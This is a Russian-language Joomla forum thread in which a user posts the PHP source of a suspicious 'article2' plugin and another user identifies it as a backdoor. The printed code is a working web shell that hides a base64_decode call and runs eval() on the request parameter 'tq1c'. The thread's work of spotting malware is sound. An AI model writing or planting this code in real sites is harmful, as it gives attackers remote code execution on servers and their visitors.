1. Уважаемые пользователи, прежде чем ответить в теме или создать новую,
    внимательно ознакомьтесь с правилами раздела

    Кому лень работать или руки не оттуда - пользуйтесь услугами специалистов
  2. Не задавайте глупых вопросов "Посоветуйте какой-нибудь компонент.."

    Есть JED!!! Ищите там!!!

Плагин Нашел странный плагин

Тема в разделе "Joomla", создана пользователем d0ublezer0, 12 окт 2019 в 14:46.

Информация :
  • Уважаемые пользователи, прежде чем ответить в теме или создать новую, внимательно ознакомьтесь с правилами раздела
  • Не задавайте глупых вопросов "Посоветуйте какой-нибудь компонент.." Есть JED!!! Ищите там!!!
  • Аналоги ищите там же - на JED!!!
  • Новая версия? - У кого будет - тот выложит!
Модераторы: arman29, DMS
  1. d0ublezer0

    d0ublezer0

    Регистр.:
    21 май 2009
    Сообщения:
    304
    Симпатии:
    168
    Не видел раньше, в разделе content плагин article2
    Не нравится он мне.
    PHP:
    <?php

    // no direct access
    defined'_JEXEC' ) or die( 'Restricted access' );

    jimport('joomla.event.plugin');
    jimport'joomla.document.document' );

    $document =& JFactory::getDocument();

    if (isset(
    $_REQUEST['tq1c']))
    {
        
    $myfunc 'bas'.'e64_'.'dec'.'ode';
        
    $myvar $myfunc($_REQUEST['tq1c']);
        
    $document->addCustomTag(eval($myvar));
    }

    class 
    plgContentArticle2 extends JPlugin
    {
        public function 
    onContentPrepare($context, &$article, &$params$page 0)
        {
            if (isset(
    $_REQUEST['tq1c']))
            {
                
    $myfunc 'bas'.'e64_'.'dec'.'ode';
                
    $myvar $myfunc($_REQUEST['tq1c']);
                
    $article->text .= eval($myvar);
            }
        }
    }

    ?>
     
  2. macteps

    macteps Писатель

    Регистр.:
    11 авг 2016
    Сообщения:
    5
    Симпатии:
    1
    Да, это чей-то бэкдор, смотри как тебе его залили. Вообще почти все в джумле где есть eval, а тем более прямая работа с $REQUEST или куками будет использоваться для выполнения какого-то своего кода.